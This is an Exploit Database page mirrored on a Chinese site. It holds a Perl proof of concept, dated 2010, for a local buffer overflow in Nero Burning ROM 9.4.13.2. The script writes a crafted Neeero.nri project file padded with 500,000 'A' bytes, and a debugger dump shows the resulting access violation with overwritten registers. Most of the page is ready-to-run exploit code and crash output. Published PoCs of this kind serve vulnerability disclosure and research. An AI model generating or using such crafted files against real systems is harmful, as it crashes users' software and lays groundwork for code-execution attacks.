Nero Burning ROM 9.4.13.2 – ISO Compilation Local Buffer Invasion (PoC)

• Exploit Database
• 114 阅读

• 作者： LiquidWorm
  日期： 2010-02-22
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11533/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84

  #!/usr/bin/perl # # # Title: Nero Burning ROM 9 (iso compilation) Local Buffer Invasion Proof Of Concept # # # Product web page: http://www.nero.com # Version tested: 9.4.13.2 # OS platform used: Microsoft Windows XP Professional SP3 (English) # # Registers pick'a'chu: # ------------------------------------------------------------------------ # # (adc.b30): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=41414141 ebx=00000000 ecx=0012ecf0 edx=00000000 esi=04c8acc8 edi=00e29890 # eip=0057f53c esp=0012ec38 ebp=0012ed28 iopl=0 nv up ei pl nz na pe nc # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206 # Nero+0x17f53c: # 0057f53c 394204cmp dword ptr [edx+4],eax ds:0023:00000004=???????? # # ------------------------------------------------------------------------ # # Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic # # liquidworm gmail com # # Zero Science Lab - http://www.zeroscience.org # # 30.09.2009 # # Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4927.php #     #### #### #### #O ## O# #[*] ## [*]# #### $id="\xFF\xFE". "\xFF\x0E\x4E\x00". "\x65\x00\x72\x00\x6F". "\x00\x49\x00\x53\x00\x4F". #####===###_O----O_###===##### "\x00\x30\x00\x2E\x00\x30\x00". "\x33\x00\x2E\x00\x30\x00\x31". "\x00\x0B\x00\x00\x00\x01". "\x00\x00\x00\x00\x00". "\x10\x4E". "\x45". "\x52". "\x4F". "\x20\x42\x55\x52\x4E\x49". "\x4E"."\x47\x20". "\x52". "\x4F"."\x4D\x00\x00"."\x00". "\x9C". "\x20\xBC\x4A\x9C". "\x20". "\xBC"."\x4A\xFF\xFF"."\xFF". "\xFF"."\xFF\xFF\xFF"."\xFF". "\x00". "\x00\x00". "\x00". "\x9F"."\x20". "\xBC"."\x4A". "\x01"."\x00". "\x00"."\x00". "\x00". "\x00". "\x00"."\x00". "\x01"."\x00\x00". "\x00\x01"."\x00". "\x00". "\x00". "\x01". "\x00". "\x00". "\x00". "\x00". "\x00". "\x00". "\x00"; ############################################### ###############################################       $fl="Neeero.nri";$op="\x41" x 500000; open nri, ">./$fl" || die "\nCan't open $fl: $!"; print nri $id.$op; print "\n ~ Invasion started...\n"; sleep 1;close nri; print "\n ~ File $fl invaded host.\n";